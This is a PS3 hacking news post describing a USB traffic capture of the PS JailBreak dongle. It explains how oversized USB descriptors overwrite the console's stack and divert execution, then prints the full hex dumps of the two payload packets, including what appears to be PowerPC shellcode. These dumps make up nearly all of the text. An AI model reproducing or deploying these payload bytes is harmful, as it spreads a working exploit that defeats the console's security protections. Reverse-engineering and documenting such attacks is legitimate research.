PS JailBreak Mod Code Sniffed via USB, Logged and Examined

Category: PS3 Hacks & JailBreak By: Karl69 - (ps3news.com)
Tags: ps jailbreak mod code ps jailbreak sniffed ps jailbreak logged ps jailbreak dump examined

142w ago - A few days ago PS JailBreak was reverse-engineered, and today Descrambler sniffed the USB traffic and shared the log.

I don't know that much about the USB protocol, but I think this is what happens:

• The PSJailbreak is inserted
• It connects with the host (PS3) and sends 09 02 12 00 01 00 00 80 + all the bytes from the first packet starting at 0008 up to 00EFF.
• The stack is overwritten and the PS3 jumps into code from the packet
• The Atmega sends a "USB Disconnect command"
• The last three steps are repeated four times

• It connects with the host and sends 09 02 4D 0A 01 01 00 80 + the bytes from the second packet starting at 0008 up to 0A4C
• The stack is overwritten and the PS3 jumps into code from the packet
• The Atmega sends a "USB Disconnect command"
• The last three steps are repeated twice.

Voilà... The PS3 is in "Debug Mode".

Apparently the third and fourth byte of the after the 09 02 are the numbers of bytes to be sent. At least this goes for the second log (4D 0A->0A4D bytes)...

The first 8 bytes are from the usb protocol left [09 02 ... ]

The code will be pushed four times onto ps3 usb stack:

00000: 09 02 12 00 01 00 00 80 FA 09 04 00 00 00 FE 01
00010: 02 00 00 00 00 00 00 00 FA CE B0 03 AA BB CC DD
00020: 38 63 F0 00 38 A0 10 00 38 80 00 01 78 84 F8 06
00030: 64 84 00 70 38 A5 FF F8 7C C3 28 2A 7C C4 29 2A
00040: 28 25 00 00 40 82 FF F0 38 84 00 80 7C 89 03 A6
00050: 4E 80 04 20 00 00 00 00 00 00 00 00 00 00 00 00
00060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00080: 7C 08 02 A6 F8 21 FF 61 FB 61 00 78 FB 81 00 80
00090: FB A1 00 88 FB C1 00 90 FB E1 00 98 F8 01 00 B0
000A0: 3B E0 00 01 7B FF F8 06 7F E3 FB 78 64 63 00 05
000B0: 60 63 0B 3C 7F E4 FB 78 64 84 00 70 60 84 01 AC
000C0: 38 A0 04 FA 4B 97 BF 59 7F E3 FB 78 64 63 00 05
000D0: 60 63 0B 3C 38 63 00 20 4B 9D 22 01 7F E3 FB 78
000E0: 64 63 00 05 60 63 0B 3C 7F E4 FB 78 64 84 00 2E
000F0: 60 84 B1 28 38 63 00 10 F8 64 01 20 7F E5 FB 78
00100: 64 A5 00 70 60 A5 01 50 80 65 00 00 28 03 00 00
00110: 41 82 00 18 80 85 00 04 7C 63 FA 14 90 83 00 00
00120: 38 A5 00 08 4B FF FF E4 48 00 05 88 F8 21 FF 51
00130: 7C 08 02 A6 FB C1 00 A0 FB E1 00 A8 FB A1 00 98
00140: F8 01 00 C0 3B C0 07 D0 3B E0 00 C8 4B 90 A9 B8
00150: 00 04 90 E0 E8 82 0F 08 00 04 90 E4 E8 7C 00 20
00160: 00 04 90 E8 F8 64 00 00 00 04 F0 A8 48 00 1A 9D
00170: 00 2A AF C8 4B DA 5B 80 00 04 ED 18 38 80 00 00
00180: 00 04 ED 1C 90 83 00 00 00 04 ED 20 4E 80 00 20
00190: 00 3B A8 90 01 00 00 00 00 05 05 D0 38 60 00 01
001A0: 00 05 05 D4 4E 80 00 20 00 00 00 00 38 60 00 01
001B0: 4E 80 00 20 48 00 02 78 48 00 01 EC 80 00 00 00
001C0: 00 05 0C A8 80 00 00 00 00 33 E7 20 80 00 00 00
001D0: 00 05 10 32 80 00 00 00 00 05 0B 7C 80 00 00 00
001E0: 00 05 0B 8C 80 00 00 00 00 05 0B 9C 80 00 00 00
001F0: 00 05 0B D4 80 00 00 00 00 33 E7 20 80 00 00 00
00200: 00 05 0C 1C 80 00 00 00 00 33 E7 20 80 00 00 00
00210: 00 05 0C 78 80 00 00 00 00 33 E7 20 80 00 00 00
00220: 00 05 0C 84 80 00 00 00 00 33 E7 20 00 00 00 00
00230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00240: 00 00 00 00 F8 21 FF 81 7C 08 02 A6 F8 01 00 90
00250: 38 80 00 00 38 A0 00 01 48 08 1D B1 80 A3 00 08
00260: 38 60 00 00 3C 80 AA AA 60 84 C0 DE 7C 04 28 40
00270: 41 82 00 08 38 60 FF FF 7C 63 07 B4 E8 01 00 90
00280: 7C 08 03 A6 38 21 00 80 4E 80 00 20 F8 21 FF 81
00290: 7C 08 02 A6 F8 01 00 90 38 80 00 00 48 08 1D 99
002A0: 38 81 00 70 38 A0 00 00 F8 A4 00 00 38 C0 21 AA
002B0: B0 C4 00 00 38 C0 00 00 B0 C4 00 06 38 C0 00 01
002C0: 78 C6 F8 06 64 C6 00 05 60 C6 0B AC 38 E0 00 00
002D0: 48 08 1C CD 38 60 00 00 E8 01 00 90 7C 08 03 A6
002E0: 38 21 00 80 4E 80 00 20 38 60 00 00 39 60 00 FF
002F0: 44 00 00 22 2C 03 00 00 40 82 00 1C 38 60 00 01
00300: 78 63 F8 06 64 63 00 05 60 63 0B BC 38 80 00 01
00310: 90 83 00 10 4E 80 00 20 F8 21 FF 31 7C 08 02 A6
00320: F8 01 00 E0 FB E1 00 C8 38 81 00 70 48 16 2E 81
00330: 3B E0 00 01 7B FF F8 06 67 FF 00 05 63 FF 0B BC
00340: E8 7F 00 00 2C 23 00 00 41 82 00 0C 38 80 00 27
00350: 48 01 17 E9 38 80 00 27 38 60 08 00 48 01 13 9D
00360: F8 7F 00 00 E8 81 00 70 4B FF C5 F9 E8 61 00 70
00370: 38 80 00 27 48 01 17 C5 E8 7F 00 00 4B FF C6 0D
00380: E8 9F 00 00 7C 64 1A 14 F8 7F 00 08 38 60 00 00
00390: EB E1 00 C8 E8 01 00 E0 38 21 00 D0 7C 08 03 A6
003A0: 4E 80 00 20 F8 21 FF 61 7C 08 02 A6 FB 81 00 80
003B0: FB A1 00 88 FB E1 00 98 FB 41 00 70 FB 61 00 78
003C0: F8 01 00 B0 7C 9C 23 78 7C 7D 1B 78 3B E0 00 01
003D0: 7B FF F8 06 7F A3 EB 78 7F E4 FB 78 64 84 00 05
003E0: 60 84 10 28 38 A0 00 09 4B FF C5 CD 28 23 00 00
003F0: 40 82 00 34 67 FF 00 05 63 FF 0B BC 80 7F 00 10
00400: 28 03 00 00 41 82 00 20 E8 7F 00 00 28 23 00 00
00410: 41 82 00 14 E8 7F 00 08 38 9D 00 09 4B FF C5 45
00420: EB BF 00 00 7F A3 EB 78 48 25 A2 38 7C 08 02 A6
00430: F8 21 FE 61 FB 61 00 78 FB 81 00 80 FB A1 00 88
00440: FB C1 00 90 FB E1 00 98 F8 01 01 B0 7C 7D 1B 78
00450: 7C 9E 23 78 3B E0 00 01 7B FF F8 06 EB 82 96 00
00460: EB 9C 00 68 EB 9C 00 18 EB 62 0F 08 E9 3D 00 18
00470: 81 29 00 30 79 29 84 02 2C 09 00 29 40 82 00 58
00480: E8 9C 00 10 78 85 C1 E4 78 A5 46 20 2C 05 00 FF
00490: 41 82 00 18 60 84 00 03 F8 9C 00 10 38 60 00 06
004A0: 90 7E 00 00 48 00 00 14 60 84 00 02 F8 9C 00 10
004B0: 38 60 00 2C 90 7E 00 00 80 BC 00 04 E8 9C 00 08
004C0: E8 7B 00 00 7D 23 2A 14 F9 3B 00 00 48 02 B1 C1
004D0: 48 00 00 C4 7F A3 EB 78 7F C4 F3 78 4B FF D9 B1
004E0: 7F FD FB 78 67 BD 00 05 63 BD 0B D0 80 7D 00 00
004F0: 80 BC 00 04 7C 63 2A 14 90 7D 00 00 E8 9C 00 10
00500: 78 85 C1 E4 78 A5 46 20 2C 05 00 FF 40 82 00 88
00510: E8 7B 00 00 38 80 00 00 38 C0 00 00 7C E3 22 14
00520: 80 A7 00 00 7C C6 2A 78 38 84 00 04 28 24 04 00
00530: 40 82 FF EC 80 7D 00 00 78 C6 07 C6 7C C6 1B 78
00540: 38 60 00 00 90 7D 00 00 7F E7 FB 78 64 E7 00 05
00550: 60 E7 0F 70 E8 67 00 00 28 23 00 00 41 82 00 38
00560: 38 E7 00 10 7C 23 30 40 40 82 FF EC E8 A7 FF F8
00570: E8 FB 00 00 80 65 00 00 28 03 00 00 41 82 00 18
00580: 80 85 00 04 7C 63 3A 14 90 83 00 00 38 A5 00 08
00590: 4B FF FF E4 38 60 00 00 EB 61 00 78 EB 81 00 80
005A0: EB A1 00 88 EB C1 00 90 EB E1 00 98 E8 01 01 B0
005B0: 38 21 01 A0 7C 08 03 A6 4E 80 00 20 F8 21 FF 51
005C0: 7C 08 02 A6 FB C1 00 A0 FB E1 00 A8 FB A1 00 98
005D0: F8 01 00 C0 3B C0 0F A0 3B E0 00 C8 4B FB 9B 98
005E0: A0 55 6F 3D 00 2C B8 FD 80 00 00 00 00 05 0F B8
005F0: 8C 0A 94 8C 00 0D 99 B1 80 00 00 00 00 05 0F E0
00600: A2 BC 1A 56 00 05 2A DC 80 00 00 00 00 05 10 04
00610: 6B 70 28 02 00 02 00 17 80 00 00 00 00 05 0F D4
00620: 00 00 00 00 00 00 00 00 00 30 53 54 38 60 00 82
00630: 00 5F 3F C0 38 60 00 01 00 5F 3F C4 4E 80 00 20
00640: 00 00 00 00 00 02 ED 0C 3B A0 00 01 00 00 00 00
00650: 00 22 B8 88 5F 74 6F 6F 00 22 B8 8C 6C 32 2E 78
00660: 00 22 B8 90 6D 6C 23 72 00 22 B8 94 6F 6F 74 00
00670: 00 00 00 00 00 0D 68 B8 5F 74 6F 6F 00 0D 68 BC
00680: 6C 32 2E 78 00 0D 68 C0 6D 6C 23 72 00 0D 68 C4
00690: 6F 6F 74 00 00 00 00 00 2F 64 65 76 5F 62 64 76
006A0: 64 00 6D 6F 64 00 00 00 00 00 00 00 00 00 00 00
006B0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
006C0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
006D0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
006E0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
006F0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00700: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00710: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00720: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00730: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00740: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00750: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00760: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00770: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00780: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00790: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
007A0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
007B0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
007C0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
007D0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
007E0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
007F0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00800: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00810: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00820: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00830: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00840: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00850: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00860: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00870: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00880: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00890: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
008A0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
008B0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
008C0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
008D0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
008E0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
008F0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00900: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00910: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00920: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00930: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00940: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00950: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00960: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00970: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00980: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00990: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
009A0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
009B0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
009C0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
009D0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
009E0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
009F0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00A00: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00A10: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00A20: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00A30: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00A40: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00A50: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00A60: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00A70: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00A80: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00A90: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00AA0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00AB0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00AC0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00AD0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00AE0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00AF0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00B00: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00B10: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00B20: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00B30: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00B40: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00B50: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00B60: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00B70: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00B80: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00B90: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00BA0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00BB0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00BC0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00BD0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00BE0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00BF0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00C00: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00C10: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00C20: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00C30: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00C40: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00C50: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00C60: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00C70: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00C80: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00C90: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00CA0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00CB0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00CC0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00CD0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00CE0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00CF0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00D00: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00D10: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00D20: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00D30: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00D40: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00D50: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00D60: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00D70: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00D80: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00D90: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00DA0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00DB0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00DC0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00DD0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00DE0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00DF0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00E00: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00E10: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00E20: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00E30: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00E40: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00E50: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00E60: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00E70: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00E80: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00E90: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00EA0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00EB0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90
00EC0: EB E1 00 98 E8 01 00 B0 38 21 00 A0 7C 08 03 A6
00ED0: 38 60 00 01 78 63 F8 06 64 63 00 70 38 80 00 00
00EE0: 38 A0 06 E8 4B 94 CA 60 60 00 00 00 60 00 00 00
00EF0: EB 61 00 78 EB 81 00 80 EB A1 00 88 EB C1 00 90

After that they push this two times on the stack to run the code via disconnect/reconnect usb devices on the bus.

00000: 09 02 4D 0A 01 01 00 80 01 09 04 00 00 00 FE 01
00010: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00020: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00030: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00040: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00050: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00060: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00070: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00080: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00090: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
000A0: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
000B0: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
000C0: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
000D0: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
000E0: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
000F0: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00100: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00110: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00120: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00130: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00140: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00150: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00160: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00170: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00180: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00190: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
001A0: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
001B0: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
001C0: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
001D0: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
001E0: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
001F0: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00200: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00210: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00220: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00230: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00240: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00250: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00260: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00270: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00280: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00290: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
002A0: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
002B0: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
002C0: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
002D0: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
002E0: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
002F0: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00300: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00310: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00320: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00330: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00340: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00350: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00360: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00370: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00380: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00390: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
003A0: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
003B0: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
003C0: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
003D0: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
003E0: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
003F0: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00400: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00410: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00420: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00430: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00440: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00450: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00460: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00470: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00480: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00490: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
004A0: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
004B0: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
004C0: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
004D0: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
004E0: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
004F0: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00500: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00510: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00520: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00530: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00540: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00550: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00560: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00570: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00580: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00590: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
005A0: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
005B0: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
005C0: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
005D0: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
005E0: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
005F0: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00600: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00610: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00620: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00630: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00640: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00650: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
00660: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00670: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00680: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00690: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
006A0: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
006B0: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
006C0: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
006D0: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
006E0: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
006F0: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00700: 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE
00710: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00720: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
00730: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
00740: 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00 00
00750: FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00
00760: 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09
00770: 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02
00780: 01 02 00 09 04 00 00 00 FE 01 02 00 09 04 00 00
00790: 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00 09 04
007A0: 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01 02 00
007B0: 09 04 00 00 00 FE 01 02 00 09 04 00 00 00 FE 01
